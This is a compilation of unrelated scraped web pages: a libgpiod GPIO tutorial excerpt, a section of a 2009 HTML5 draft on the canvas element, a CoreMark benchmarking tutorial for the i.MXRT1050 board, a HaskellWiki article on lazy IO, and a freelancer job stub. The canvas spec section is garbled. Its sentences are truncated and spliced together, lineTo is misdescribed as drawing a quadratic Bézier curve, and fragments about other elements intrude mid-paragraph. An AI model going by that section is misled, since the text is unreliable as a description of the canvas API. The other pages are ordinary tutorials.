If you see error messages in VS Code concerning the new header file, you can either ignore them or copy the ARM headers into a sub-folder using the copyARMheaders task. This copies all of the standard headers to a sub-folder called include on the local machine. Notice that this is only necessary to satisfy the local machine's error checking - the program will run on the remote machine without any problems as long as the header is available there.

If you want to do the same job on the command line, add the option:

-lgpiod

The context-less functions all have ctxless in their names and they work by opening the necessary files, performing the operation and then closing them again. This means you don't have to keep track of what files are open and what GPIO lines are in use, but you have the overhead and side effects of repeatedly opening and closing files.
There are two simple get/set functions:

gpiod_ctxless_get_value("device", offset, active_low, "consumer");
gpiod_ctxless_set_value("device", offset, value, active_low, "consumer", callback, param);

where device is the name, path, number or label of the gpiochip, usually just 0, and offset is the GPIO number of the line you want to use. value is 0 or 1 according to whether you want the GPIO line set high or low, and active_low sets the state of the line regarded as active. If set to true, 1 sets the line low and vice versa. You usually want to set this to 0 so that 1 sets it high. Replace consumer with the name of the program/user/entity using the GPIO line. The parameters callback and param work together to define a callback function and the parameters passed to it. The callback function is called immediately before the line is closed. The get version of the function returns the current state of the line as a 0 or 1, according to the line state and the setting of active_low.
https://i-programmer.info/programming/hardware/14457-pi-iot-in-c-using-linux-drivers-gpio-character-driver.html
The canvas element

width
height

interface HTMLCanvasElement : HTMLElement {
  attribute unsigned long width;
  attribute unsigned long height;
  DOMString toDataURL([Optional] in DOMString type, [Variadic] in any args);
  Object getContext(in DOMString contextId);
};

The canvas element represents a resolution-dependent bitmap canvas, which can be used for rendering graphs, game graphics, or other visual images on the fly. In non-interactive media, or when scripting is disabled, the canvas element represents its fallback content instead.

Whenever the width and height attributes are set (whether to a new value or to the previous value), the bitmap and any associated contexts must be cleared back to their initial state and reinitialized with the newly specified coordinate space dimensions. The width and height DOM attributes must reflect the respective content attributes of the same name.

When the canvas is initialized it must be set to fully transparent black.

To draw on the canvas, authors must first obtain a reference to a context using the getContext(contextId) method of the canvas element. Arguments other than the contextId must be ignored. A future version of this specification will probably define a 3d context (probably based on the OpenGL ES API).

When the getContext() method of a canvas element is invoked with 2d as the argument, a CanvasRenderingContext2D object is returned. There is only one CanvasRenderingContext2D object per canvas, so calling the getContext() method with the 2d argument a second time must return the same object.

interface CanvasRenderingContext2D {
  ...
  // pixel manipulation
  ImageData createImageData(in float sw, in float sh);
  ...
};

[IndexGetter, IndexSetter] interface CanvasPixelArray {
  readonly attribute unsigned long length;
};

The canvas attribute must return the canvas element that the context paints on.

Unless otherwise stated, for the 2D context interface, any method call with a numeric argument whose value is infinite or a NaN value must be ignored. [CSS3COLOR]

Each context maintains a stack of drawing states. Drawing states consist of: strokeStyle, fillStyle, globalAlpha, lineWidth, lineCap, lineJoin, miterLimit, shadowOffsetX, shadowOffsetY, shadowBlur, shadowColor, globalCompositeOperation, font, textAlign, textBaseline.
The current path and the current bitmap are not part of the drawing state. The current path is persistent, and can only be reset using the beginPath() method. The current bitmap is a property of the canvas, not the context.

The save() method must push a copy of the current drawing state onto the drawing state stack. The restore() method must pop the top entry in the drawing state stack, and reset the drawing state it describes. If there is no saved state, the method must do nothing.

All drawing operations are affected by the global compositing attributes, globalAlpha and globalCompositeOperation. The globalAlpha attribute must initially have the value 1.0.

source-atop
source-in
source-out
source-over (default)
destination-atop
    Same as source-atop but using the destination image instead of the source image, and vice versa.
destination-in
    Same as source-in but using the destination image instead of the source image, and vice versa.
destination-out
    Same as source-out but using the destination image instead of the source image, and vice versa.
destination-over
    Same as source-over but using the destination image instead of the source image, and vice versa.
lighter
copy
xor
vendorName-operationName

These values are all case-sensitive — they must be used exactly as shown. User agents must not recognize values that are not a case-sensitive match for one of the values given above. When the context is created, the globalCompositeOperation attribute must initially have the value source-over.

On setting strokeStyle or fillStyle, string values must be parsed as CSS <color> values, and CanvasGradient and CanvasPattern objects must be assigned themselves. [CSS3COLOR] If the value is a string but is not a valid color, or is neither a string, a CanvasGradient, nor a CanvasPattern, then it must be ignored, and the attribute must retain its previous value. On getting, if the value is a color, then the serialization of the color must be returned.
Otherwise, if it is not a color but a CanvasGradient or CanvasPattern, then the respective object must be returned. (The serialization of a non-opaque color ends with a U+002E FULL STOP (representing the decimal point), one or more digits in the range 0-9 (U+0030 to U+0039) representing the fractional part of the alpha value, and finally a U+0029 RIGHT PARENTHESIS.) When the context is created, the strokeStyle and fillStyle attributes must initially have the string value #000000.

There are two types of gradients, linear gradients and radial gradients, both represented by objects implementing the opaque CanvasGradient interface.

The addColorStop(offset, color) method on the CanvasGradient interface adds a new stop to a gradient. If the offset is less than 0, greater than 1, infinite, or NaN, then an INDEX_SIZE_ERR exception must be raised. If the color cannot be parsed as a CSS color, then a SYNTAX_ERR exception must be raised.

If any of the arguments to createLinearGradient() are infinite or NaN, the method must raise a NOT_SUPPORTED_ERR exception. Otherwise, it must return a linear CanvasGradient; similarly, createRadialGradient() must return a radial CanvasGradient initialized with the two specified circles. Colors are rendered at each position on the gradient with the colors coming from the interpolation and extrapolation described above. Gradients must be painted only where the relevant stroking or filling effects require that they be drawn. The points in the radial gradient must be transformed as described by the current transformation matrix when rendering.

The createPattern() method must return a CanvasPattern object suitably initialized. When the createPattern() method is passed, as its image argument, an animated image, the poster frame of the animation, or the first frame of the animation if there is no poster frame, must be used.

The lineWidth attribute gives the width of lines, in coordinate space units. On setting, zero, negative, infinite, and NaN values must be ignored, leaving the value unchanged. When the context is created, the lineWidth attribute must initially have the value 1.0.

The miterLimit attribute limits how far the pointed corner where two lines touch on the inside of a join may extend. On setting, zero, negative, infinite, and NaN values must be ignored, leaving the value unchanged. When the context is created, the miterLimit attribute must initially have the value 10.0.
All drawing operations are affected by the four global shadow attributes.

The shadowColor attribute sets the color of the shadow. When the context is created, the shadowColor attribute initially must be fully-transparent black. On getting, the serialization of the color must be returned. On setting, the new value must be parsed as a CSS <color> value and the color assigned. If the value is not a valid color, then it must be ignored, and the attribute must retain its previous value. [CSS3COLOR]

The shadowBlur attribute specifies the size of the blurring effect. (The units do not map to coordinate space units, and are not affected by the current transformation matrix.) When the context is created, the shadowBlur attribute must initially have the value 0. On getting, the attribute must return its current value. On setting, the attribute must be set to the new value, except if the value is negative, infinite or NaN, in which case the new value must be ignored. When shadows are drawn, they must be rendered as follows: Let A be the source image for which a shadow is being created.

The rect methods are affected by the clipping region and, with the exception of clearRect(), also shadow effects, global alpha, and global composition operators. The fillRect(x, y, w, h) method must paint the specified rectangle using fillStyle. If either height or width are zero, this method has no effect. The strokeRect(x, y, w, h) method must stroke the specified rectangle's path using the strokeStyle, lineWidth, lineJoin, and (if appropriate) miterLimit attributes.

The context always has a current path. There is only one current path; it is not part of the drawing state. Initially, the context's path must have zero subpaths. The points and lines added to the path by these methods must be transformed according to the current transformation matrix. (A new subpath is created by a moveTo() call.) New points and the lines connecting them are added to subpaths using the methods described below. In all cases, the methods only modify the last subpath in the context's paths.

The lineTo(x, y) method must do nothing if the context has no subpaths.
Otherwise it must connect the last point in the subpath to the given point (x, y) using a quadratic Bézier curve with control point (cpx, cpy), and must then add the given point (x, y) to the subpath. [BEZIER] The bezierCurveTo(cp1x, cp1y, cp2x, cp2y, x, y) method must do nothing if the context has no subpaths. Otherwise, it. [BEZIER] The arcTo(x1, y1, x2, y2, radius) method must do nothing if the context has no subpaths. If the context does have a subpath, then the behavior depends on the arguments and the last point in the subpath.: if the direction from (x0, y0) to (x1, y1) is the same as the direction from (x1, y1) to (x2, y2), then the). lineWidth, lineCap, lineJoin, and (if appropriate) miterLimit attributes, and then fill the combined stroke area using the shadow effects, global alpha, the clipping region, and. The font DOM attribute, on setting, must be parsed the same way as the 'font' property of CSS (but without supporting property-independent stylesheet syntax like 'inherit'), and the resulting font must be assigned to the context, with the 'line-height' component forced to 'normal'. If the new value is syntactically incorrect, then it must be ignored, without assigning a new font value. [CSS] Font names must be interpreted in the context of the canvas element's stylesheets; any fonts embedded using @font-face must therefore be available. [CSSWEB. [CSSOM] DOM attribute, on getting, must return the current value. On setting, if the value is one of start, end, left, right, or center, then the value must be changed to the new value. Otherwise, the new value must be ignored. When the context is created, the textAlign attribute must initially have the value start. The textBaseline: Let font be the current font of the context, as given by the font attribute. Replace all the space characters in text with U+0020 SPACE characters.. [CSS].. For strokeText() the reverse holds and strokeStyle must be applied to the glyph outlines and fillStyle must be ignored. 
Text is painted without affecting the current path, and is subject to shadow effects, global alpha, the clipping region, and font attribute, and must then return a new TextMetrics object with its width attribute set to the width of that inline box, in CSS pixels. , the implementation must raise an INDEX_SIZE_ERR must return an createImageData() or getImageData() are infinite or NaN, the method must instead raise a NOT_SUPPORTED_ERR exception. If either the sw or sh arguments are zero, the method must instead raise an INDEX_SIZE_ERR exception. CanvasPixelArray object holding the image data. At least one pixel's worth of image data must be returned. The CanvasPixelArray object thus represents h×w×4 integers. The length attribute of a CanvasPixelArray object must return this number.. When a CanvasPixelArray object is indexed to modify an indexed property index with value value, the value of the indexth component in the array must be set to value. JS undefined values must be converted to zero. Other values must first be converted to numbers using JavaScript's ToNumber algorithm,r convertToIntegerTiesToEven rounding mode. [ECMA262] [IEEE754R] ImageData structures back to the canvas. If any of the arguments to the method are infinite or NaN, the method must raise a NOT_SUPPORTED_ERR exception. If the first argument to the method is null or not an ImageData object. When invoked with arguments that do not, per the last few paragraphs, cause an exception to be raised, the putImageData() method must act as follows:.device+x, dydevice), x, y); ...for any value of x, y, w, and h, and the following two calls: context.createImageData(w, h); context.getImageData(0, 0, w, h); ...must return ImageData objects with the same dimensions, for any value of w and h. 
In other words, while user agents may round the arguments of these methods so that they map to device pixel boundaries, any rounding performed must be performed consistently for all of the createImageData(), getImageData() and putImageData() operations. The current path, transformation matrix, shadow attributes, global alpha, the clipping region, and global composition operator must not affect the getImageData() and putImageData() methods. The data returned by getImageData() is at the resolution of the canvas backing store, which is likely to not be one device pixel to each CSS pixel if the display used is a high resolution display. In the following example, the script generates an getImageData() and> When a shape or image is painted, user agents must follow these steps, in the order given (or act as if they do): Render the shape or image, creating image A, as described in the previous sections. For shapes, the current fill, stroke, and line styles must be honored, and the stroke must itself also be subjected to the current transformation matrix.. If the id attribute is also specified, both attributes must have the same value. DOM; attribute DOMString href; attribute DOMString target; attribute DOMString ping; attribute DOMString rel; readonly attribute DOMTokenList relList; attribute DOMString media; attribute DOMString hreflang; attribute DOMString type; };: DOMActivateevent in question is not trusted (i.e. a click()method call was the reason for the event being dispatched), and the areaelement's targetattribute is ... then raise an INVALID_ACCESS_ERRexception. areaelement, if any. The DOM attributes alt, coords, href, target, ping, rel, media, hreflang, and type, each must reflect the respective content attributes of the same name. The DOM attribute shape must reflect the shape content attribute, limited to only known values. The DOM attribute relList must reflect the rel content attribute. 
coloured category for the purposes of the content models in this specification. User agents must handle text other than inter-element whitespace found in MathML elements whose content models do not allow raw a namespace-well-formed XML fragment. The svg element. When the SVG foreignObject element contains elements from the HTML namespace, such elements must all be flow content and must not be interleaved with non-HTML elements. [SVG] greater than zero.. Basically, the dimension attributes can't be used to stretch the image. The width and height DOM attributes on the iframe, embed, object, and video elements must reflect the respective content attributes of the same name.
http://www.w3.org/TR/2009/WD-html5-20090212/the-canvas-element.html
Coremark is a benchmark tool that helps you select the MCU that meets your system requirements by allowing a proper comparison of the performance of various MCUs. You can measure core performance easily, as CoreMark can be run on any MCU. This time, I got an i.MXRT1050-EVK board, and I wanted to know what on earth its performance is like. You should be surprised at the amazing performance!

Contents
- 1 EVK board to be measured
- 2 To get Coremark
- 3 Files you need
- 4 Base project that I used
- 5 Implementation steps
- 6 Measurement result
- 7 Summary

EVK board to be measured

As I already mentioned, I used the i.MXRT1050-EVK. Actually, the device marking printed on the device is i.MXRT1052.

i.MX RT1050 specification

Here are the specifications and features of the i.MXRT1050.

Program execution

This device basically doesn't integrate any Flash ROM. NO FLASH! It needs to execute the program code out of RAM, SDRAM or QSPI Flash.

Support QSPI Flash XIP!

Instead, the i.MXRT supports QSPI XIP (eXecute In Place), so that program code can be executed directly from QSPI flash without having to download it into RAM. This approach makes the system BOM cost lower than an embedded-flash system. Of course, there is a penalty cycle when you execute from external memory. Code for which processing speed matters is recommended to be placed in RAM and executed from there. In order to compensate for the access penalty, a relatively large cache (I-cache 32kB, D-cache 32kB) is integrated to boost system performance.

IDE (Integrated Development Environment)

I used IAR EWARM for the benchmarking. You may want to download it from here. ->IAR Embedded Workbench for ARM

To get Coremark

Now I will show you how to implement Coremark. First, you need to download it. You may want to download it from EEMBC. After registration, you can download it.
Download here→EEMBC-COREMARK

Files you need

When you use the MCUXpresso SDK, all you need is five C source files (.c) and two header files (.h):

- core_portme.c
- core_portme.h
- core_list_join.c
- core_main.c
- core_matrix.c
- core_util.c
- coremark.h

These files need to be modified according to your environment. Now, let's see how.

Base project that I used

I used the Hello World sample code which comes with the MCUXpresso SDK. I implemented Coremark based on this project since everything, including startup files and clock configuration, is configured by default. If you want to download the SDK, you can do it from here.→MCUXpresso SDK

Implementation steps

1. Add the GPT timer driver and Coremark source files to the project

Add GPT driver

In order to measure the cycle count for Coremark, I used the GPT (General Purpose Timer). You can use other timers if available. However, the GPT timer driver is not added to the project by default. You need to add it manually from the SDK path shown below.

i.MXRT1050 SDK folder/drivers/evkimxrt1050/drivers/

This folder contains all the drivers. You can just drag & drop them into the drivers group in the EWARM project.

Add coremark files

I made a folder (group) named "coremark" in the EWARM project and added the Coremark files by drag & drop, the same way as the GPT driver.

2. Modify core_main.c

Line 89, MAIN_RETURN_TYPE main(void){, needs to be modified, as the function name clashes with the project's own main(). You can just rename it to a simple function name that you can easily recognize as the Coremark process. I renamed it to main_coremark(void).

#if MAIN_HAS_NOARGC
//MAIN_RETURN_TYPE main(void) {
MAIN_RETURN_TYPE main_coremark(void) {
    int argc=0;
    char *argv[1];
#else
MAIN_RETURN_TYPE main(int argc, char *argv[]) {
#endif

3. Modify hello_world.c

Added #include "coremark.h"
Added #include "fsl_gpt.h"

I modified the main() function as below. The GPT timer is initialized and its clock (the IPG clock) is divided by 2.
At the top of hello_world.c, the GPT timer needs to be defined:

#define GPT_IRQ_ID GPT1_IRQn
#define EXAMPLE_GPT GPT1
#define EXAMPLE_GPT_IRQHandler GPT1_IRQHandler
/* Select IPG Clock as PERCLK_CLK clock source */
#define EXAMPLE_GPT_CLOCK_SOURCE_SELECT (0U)
/* Clock divider for PERCLK_CLK clock source */
#define EXAMPLE_GPT_CLOCK_DIVIDER_SELECT (0U)
/* Get source clock for GPT driver (GPT prescaler = 0) */
#define EXAMPLE_GPT_CLK_FREQ (CLOCK_GetFreq(kCLOCK_IpgClk) / (EXAMPLE_GPT_CLOCK_DIVIDER_SELECT + 1U))

int main(void)
{
    gpt_config_t gptConfig;

    /* Init board hardware */
    BOARD_InitPins();
    BOARD_BootClockRUN();
    BOARD_InitDebugConsole();

    /* Clock setting for GPT */
    CLOCK_SetMux(kCLOCK_PerclkMux, EXAMPLE_GPT_CLOCK_SOURCE_SELECT);
    CLOCK_SetDiv(kCLOCK_PerclkDiv, EXAMPLE_GPT_CLOCK_DIVIDER_SELECT);

    /* GPT timer is set up for measurement of CoreMark */
    GPT_GetDefaultConfig(&gptConfig);

    /* Initialize GPT module */
    GPT_Init(EXAMPLE_GPT, &gptConfig);

    /* Divide GPT clock source frequency by 2 inside GPT module */
    GPT_SetClockDivider(EXAMPLE_GPT, 2);

    /* Start Timer */
    PRINTF("\r\nStarting GPT Timer...");
    GPT_StartTimer(EXAMPLE_GPT);

    /* CoreMark start */
    main_coremark();

    while (1)
        ;
}

4. Modify core_portme.h

Add #include "stdlib.h" and comment out #define NULL ((void *)0).

In this header you configure the number of CoreMark iterations, the clock frequency of the timer you use, and the compiler information. I configured it as below:

#define ITERATIONS 30000 // Number of CoreMark iterations; for i.MXRT1050, around 30000 seems good
#define CLOCKS_PER_SEC 150000000 // Timer clock frequency
#define COMPILER_VERSION "IAR EWARM v8.20.2" // Compiler information
#define COMPILER_FLAGS "SPEED" // Compiler flag; I set the IAR EWARM compiler optimization to SPEED
#define MEM_LOCATION "RAM" // Place of execution

The data types depend on your environment, but I configured them for the MCUXpresso SDK.
I set HAS_TIME_H = 0, USE_CLOCK = 0, HAS_STDIO = 1, HAS_PRINTF = 1:

/************************/
/* Data types and settings */
/************************/
/* Configuration : HAS_FLOAT
   Define to 1 if the platform supports floating point. */
#ifndef HAS_FLOAT
#define HAS_FLOAT 1
#endif
/* Configuration : HAS_TIME_H
   Define to 1 if platform has the time.h header file, and implementation of functions thereof. */
#ifndef HAS_TIME_H
//#define HAS_TIME_H 1
#define HAS_TIME_H 0
#endif
/* Configuration : USE_CLOCK
   Define to 1 if platform has the time.h header file, and implementation of functions thereof. */
#ifndef USE_CLOCK
//#define USE_CLOCK 1
#define USE_CLOCK 0
#endif
/* Configuration : HAS_STDIO
   Define to 1 if the platform has stdio.h. */
#ifndef HAS_STDIO
//#define HAS_STDIO 0
#define HAS_STDIO 1
#endif
/* Configuration : HAS_PRINTF
   Define to 1 if the platform has stdio.h and implements the printf function. */
#ifndef HAS_PRINTF
//#define HAS_PRINTF 0
#define HAS_PRINTF 1
#endif

5. Modify core_portme.c

Comment out the #error line in barebones_clock() and return the GPT count instead:

CORETIMETYPE barebones_clock() {
    //#error "You must implement a method to measure time in barebones_clock"
    return GPT_GetCurrentTimerCount(GPT1);
}

Likewise, comment out the #error line inside portable_init():

void portable_init() {
    //#error "Call board initialization routines in portable init (if needed), in particular"
    if (sizeof(ee_ptr_int) != sizeof(ee_u8 *)) {
    :
    :

6. Set the include path in the EWARM options

Lastly, you need to set the include path in the option settings of EWARM. Sorry, the screenshot is from a Japanese Windows environment, since my PC is set up in Japanese.

Measurement result

The score comes out at 2,943! That is way more than I expected!! The i.MXRT1050 runs at 600 MHz, so that is about 4.9 CoreMark/MHz! Let me put that number in perspective: the Cortex-M4F core of a Kinetis K60 (100 MHz) scores about 270 in CoreMark, i.e. 2.7 CoreMark/MHz. The i.MXRT1050 is therefore roughly 10 times faster than the Kinetis MCU in absolute terms, and almost double in CoreMark/MHz!
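Numbers, not adjectives: the comparison above is just two divisions. A quick plain-Python check of the arithmetic, with the scores and clock speeds taken from the text:

```python
def coremark_per_mhz(score: float, clock_mhz: float) -> float:
    """Normalize a raw CoreMark score by the core clock frequency."""
    return score / clock_mhz

# i.MXRT1050: 2943 points at 600 MHz
imxrt = coremark_per_mhz(2943, 600)

# Kinetis K60 (Cortex-M4F): 270 points at 100 MHz
k60 = coremark_per_mhz(270, 100)

print(f"i.MXRT1050: {imxrt:.1f} CoreMark/MHz")   # ~4.9
print(f"K60:        {k60:.1f} CoreMark/MHz")     # 2.7
print(f"absolute:   {2943 / 270:.1f}x faster")   # ~10.9x
```

So "about 10 times faster" and "almost double per MHz" both follow directly from the raw scores.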
Summary

I showed how to implement CoreMark and presented the measurement result. You can easily implement CoreMark in the same way for other devices; basically, CoreMark can be ported to any MCU. You can use this as a reference.
https://mcu-things.com/blog/imxrt-how-to-coremark-implementation/
Haskell IO for Imperative Programmers
From HaskellWiki

My goal is to help experienced procedural programmers make the transition to Haskell, not to provide a tour of language features. I don't want to show you how to do imperative programming in Haskell; I want to show you how not to.

1 Introduction

There is a widespread misconception that basic input and output is hard to do in Haskell and that therefore the language is not suitable for writing practical programs. I've even heard it stated that one must master category theory in order to so much as write to standard output. Nothing could be further from the truth. Witness,

    main = putStrLn "Hello, world!"

About the only way that could be easier would be if there were a "Hello, world!" primitive built into the language, and that would be silly. Stop and think about the basic premise — the whole point of running a program is to have side-effects — no one in their right mind is going to design a language that makes that hard to do. Who here thinks Erik Meijer is a nincompoop? Show of hands? It's not like he's brilliant as long as he's working on VB and then turns into a moron the minute he starts thinking about Haskell. Before proceeding please allow yourself to consider the possibility that IO in Haskell might not be difficult.

That said, I will concede that it is also not obvious, but for reasons that don't have anything to do with category theory. There is a fundamental tension in functional languages. On the one hand you must have side-effects in order to justify all the oxygen you're consuming, but on the other hand you don't want side effects because they make it harder to write correct and composable programs. The way to resolve that tension is to think differently. Instead of thinking about IO as something you do, you need to shift gears and think about IO as a result that you achieve. The programming task then becomes one of describing the program's interaction with the outside world.
(That turns out to be a much more powerful idea, the full consequences of which are beyond the scope of this post.) The catch, of course, is that "thinking differently" is one of those things that are much easier to say than to do.

2 "Hello, world!" Reloaded

Returning to "Hello, world!" — it's cute, but it's not a practical example. It doesn't do any useful work. What is "useful work"? Your most basic utility program (say, to analyze a log file) needs to read some input line-by-line, process it, and write some output. Anything less than that is a waste of time. Coming from an imperative background you're used to writing programs with this basic template

    while (<>) {
        &processIt($_);
    }

So you naturally expect to write something in Haskell that looks like this

    main = do
        line <- getLine
        processIt line
        main

This will work (mostly), but you're already in trouble. You just don't know it yet. There are a couple of problems here, so let's examine the thinking behind it. First, you've written a recursive function. You did that because you know Haskell doesn't have any looping constructs, which is annoying but no big deal so you get over it and get on with your work. Second, there is a very real muddying of concerns. There's a routine that does input that calls a processing routine that, by implication, if the program is to actually do anything, must be calling an output routine. These are separate issues that should be handled separately, but it's not clear at this stage how to accomplish that.

Let's talk about the recursion. Recursion can be used, among other things, to express an iteration. I have often stated that you simply don't write iterative constructs in Haskell. That's not literally true, I've written almost as many as I can count on one hand, but it's certainly not something you do every day. Not the way every third statement is a for or while in an imperative language. It's all handled by library functions.
If you define a recursive data structure you will provide a collection of routines that iterate over it and no one else ever needs to know the details. If you're writing an "iterative" program that doesn't involve an explicit data structure, odds are it can be expressed as an operation over a list

    fac n = product [1 .. n]

Writing Haskell you want to learn to think in terms of operations on aggregates: "do this to that collection." If you're sweating the details then you're probably thinking procedurally. That's why if you write an iteration it should be taken as a warning sign that you're not using the language appropriately. Stop and think.

As for separation of concerns, let's flesh out the example a little more and add type signatures.

    main :: IO ()
    main = do
        line <- getLine
        processIt line
        main

    processIt :: String -> IO ()
    processIt s = do
        print (length s)

So where are we? We wrote the obvious program to try to actually do something useful with this !@#$% language and instead of saying "see, it's just as easy as Perl" I told you that it contained two big flashing red lights warning us we're not using the language correctly. Disgusting, isn't it?

It's important to realize at this point that the problem isn't monads. I won't lie to you, monads are not the easiest thing in the world to wrap your head around and you will need to grok them someday in order to become an effective Haskell programmer, but they don't even come into the picture at this point. I only mention them because all the other tutorials do and so you're expecting it. That said, forget about them. The problem is imperative-think. We wrote an imperative program in Haskell. See, it is possible to write imperative programs in Haskell! Easy, even. Now that you know you can, don't. But it does no good for me to say, "stop thinking imperatively." Habits of thought die hard. I have to give you something to replace it with.
Haskell provides the means for you to organize your programs in new and exciting ways that really bear very little resemblance to what you're used to doing in imperative languages. That could be a book. For right now, though, one of the things that makes IO seem difficult at first glance is a failure to appreciate the virtues of laziness.

3 Laziness

I'm sure you've seen some attempts to explain laziness by way of apparently contrived examples involving infinite lists, but if you're coming to Haskell from an imperative background you don't get it. Trust me, you don't. It is a simple idea with far-reaching implications and it is one of the defining features of the language. After learning Haskell, I'd rather gnaw off my own arm than try to live without laziness. So, what is it?

First let's deal with the notion of strictness. A language is strict if it evaluates the arguments to a function before it evaluates the function. A non-strict language doesn't. For example, define

    f x y = x * y

In a strict language a call to f would be evaluated as

    f (1+2) (3+4) = f 3 7 = 3 * 7 = 21

In a non-strict language that same call would be evaluated as

    f (1+2) (3+4) = (1+2) * (3+4) = 3 * 7 = 21

It looks like a small difference. To say that Haskell is lazy means that it is aggressively non-strict — it never evaluates anything before it absolutely needs to (unless you tell it otherwise, but that's another story). This changes the way you code.

Other languages have the occasional non-strict construct. Short-circuit booleans and ternary operators are very common and they let you write code such as

    if (i < x.size() && x[i] > 0) {

which would otherwise explode. It's a lot more convenient than nested ifs. Many languages let you create your own non-strict constructs, generally with macros,

    #define first(x, a, b) if (a > 0) x = a; else x = b

    first(x, a++, b++);

In this horribly contrived example, b may never be incremented, depending on the value of a.
That is, presumably, the programmer's intent. There is also the obvious bug that a may well get incremented twice. Presumably, not the programmer's intent. The example is deliberately sloppy to leave the door open for all kinds of other bugs the details of which aren't really relevant. The point is that, in an imperative language, this kind of thing is very dangerous. This is why the use of macros is generally discouraged. The "solution" here is to use an inline function (or Lisp). The inline would eliminate all the bugs, but it would also enforce strict semantics — that is, it will fail to do the thing we had hoped to achieve by using a macro in the first place.

There are a couple of points here. One is that while the notion of a non-strict operation may not seem mind-bending, coming from an imperative language it's something you haven't used much and therefore haven't really internalized. The other is the relationship between laziness and side-effects. Clearly, they're two great tastes that don't go well together, like macaroni and blue-cheese dressing. Haskell can't have side effects because the laziness ensures that you don't know what's happening or when. That's a great thing! Wonderful! There's no reason to get bogged down in those sorts of low-level details unless you absolutely need to.

4 IO

What does this have to do with IO? While Hoogle-ing you may run across this:

    do { s <- getContents
       ; return $ lines s }

It's the equivalent of

    @lines = <>;

But no way do you want to do that. Slurp in and split an entire file, not knowing how big it is? That's crazy talk, man! Or is it? It's probably clear from context that, no, it's not. So rather than writing code that interleaves input with processing with output as you're used to, you can write code that does input and then does processing and then does output, and all the messy interleaving is handled by the lazy semantics of the language.
It’s as if you’ve defined a collection of cooperating processes, producers and consumers, all running in lockstep. The solution is much more modular, and your program will still run in constant space and linear time. It’s the closest thing to magic that I know of. That’s what laziness buys you. Laziness enables a new kind of modularity that you may not have seen before. With laziness, you can easily separate generation from processing. When generation and processing are less tightly coupled both are freer to evolve. Let’s evolve the example. main = do s <- getContents let r = map processIt (lines s) putStr (unlines r) processIt s = show (length s) main = interact (unlines . map processIt . lines) interact f = do s <- getContents putStr (f s) main = interact (unlines . map processIt . lines) or main = io (map processIt) io f = interact (unlines . f . lines) That’s an idiomatic Haskell program for doing simple IO. You can find several more good examples here. To write these programs you don’t have to know a thing about monads. You do have to rethink your overall strategy for solving the problem. No more can you think about reading this and writing that, and all of that busy, busy “doing stuff.” Now you need to think in terms of describing the overall result that you want. That’s hard. Or, rather, it requires some practice. Once you’ve succeeded in thinking clearly in terms of the result you want to achieve without letting yourself get bogged down in the details of how to go about it, step by step, then the mechanics of making it happen are, frankly, trivial. 5 More I’m anticipating two possible reactions to the above code. You may think that it looks so simple that you have a hard time believing that it actually does anything. It’s deceptive, because the end result is actually easier than the corresponding code in an imperative language. Probably not what you were expecting when you came here. 
If this is the case, then reread the last few code blocks until you can see the flow. Alternately, you may think that this still counts as trivial, not really significantly different from "Hello, world", and you want your money back. In that case, let's crank up the heat. The rest of this will be more examples of increasing complexity and decreasing explanation.

There's more to life than standard input. Can't we let the user specify input files on the command-line?

    import System.Environment

    main = do args <- getArgs
              mapM_ (interactFile (unlines . map processIt . lines)) args

    interactFile f fileName = do s <- readFile fileName
                                 putStr (f s)

That processes each file individually, but maybe we'd rather do something more Perl-esque and treat all the command-line arguments as one big virtual file.

    main = do args <- getArgs
              interactFiles (unlines . map processIt . lines) args

    interactFiles f fileNames = do ss <- mapM readFile fileNames
                                   putStr $ f (concat ss)

Don't let it bother you. Nobody ever makes their first jump.

But aren't both these examples just so much hooey? There's no error handling, and you never know what a user is going to type in. I suppose we could substitute something safer for readFile:

    safeRead s = catch (readFile s) $ \_ -> return ""

Contrasting this with Java is left as an exercise for the reader.

Maybe line-by-line processing isn't your thing. We could, just as an example, add up all the rows in our input

    main = interact $ show . sum . map read . lines

Even by column.

    main = interact $ show . foldl addRows (repeat 0) . map row . lines

    addRows = zipWith (+)

    row = map read . words

So far, so good. It's easy to see how you can do simple file processing in Haskell. This is adequate for, say, reading and summarizing log files. What about something more interesting, such as configuration files?
A configuration file is likely to have some sort of include mechanism. In an imperative language:

    sub processFile {
        open FH, shift;
        while (<FH>) {
            if (&isInclude($_)) {
                &processFile(&includeFile($_));
            } else {
                # other stuff
            }
        }
        close FH;
    }

vs.

    readWithIncludes :: String -> IO [String]
    readWithIncludes f = do s <- readFile f
                            ss <- mapM expandIncludes (lines s)
                            return (concat ss)

    expandIncludes :: String -> IO [String]
    expandIncludes s = if isInclude s
                       then readWithIncludes (includeFile s)
                       else return [s]

Two mutually recursive IO functions… You'll note that this isn't a simple use of recursion to express an iteration, as even the imperative solution is naturally expressed recursively. What's much more important is that these functions are only doing IO. Processing is still "somewhere else," not buried three levels deep inside an IO routine. This means that our new include file mechanism can be freely mixed with all the other techniques we've been developing with no loss of modularity.

6 Monads are Gravy

The thing that makes IO in Haskell seem hard is learning to think in terms of a pure, lazy, functional language. If you can unlearn some old habits of thought it can be even easier than what you're used to doing in imperative languages. I realize that's like saying you can catch a bird if you put salt on its tail so I've tried to provide some help in that direction. The secret to success is to start thinking about IO as a result that you achieve rather than something that you do. Monadic IO is a formalization of that idea. We didn't cover monads because they obscure the real challenges of just learning to think functionally, but they're there to make your life easier. They add more power, letting you think about actions as tangible objects that you can manipulate and even letting you define your own control structures. You don't need all of that power in order to just get started writing practical programs and doing useful work.
Using just the techniques covered above (and maybe a dash of regular expressions) you can start to rock and roll.
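As a coda for imperative readers: the include-expansion pair from the configuration-file example ports cleanly to other languages once the traversal logic is kept separate from the file access. Here is a rough Python analogue; the names and the `include ` line convention are mine, and the reader function is injected so the logic stays testable without touching a real filesystem:

```python
def expand_includes(path, read_file):
    """Return the lines of `path`, recursively splicing in included files.

    `read_file` maps a path to that file's text; a line of the form
    `include X` is replaced by the expanded contents of X.
    """
    out = []
    for line in read_file(path).splitlines():
        if line.startswith("include "):
            # the mutual-recursion step: expand the included file in place
            out.extend(expand_includes(line[len("include "):], read_file))
        else:
            out.append(line)
    return out

# A dict-backed stand-in for the filesystem:
files = {
    "main.cfg": "a = 1\ninclude extra.cfg\nb = 2",
    "extra.cfg": "c = 3",
}
print(expand_includes("main.cfg", files.get))
# → ['a = 1', 'c = 3', 'b = 2']
```

As in the Haskell version, only the traversal does IO-like work; what you do with the expanded lines lives somewhere else entirely.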
http://www.haskell.org/haskellwiki/index.php?title=Haskell_IO_for_Imperative_Programmers&direction=prev&oldid=42244
Customized List CheckBox control

This project received 9 bids from talented freelancers with an average bid price of $132 USD.

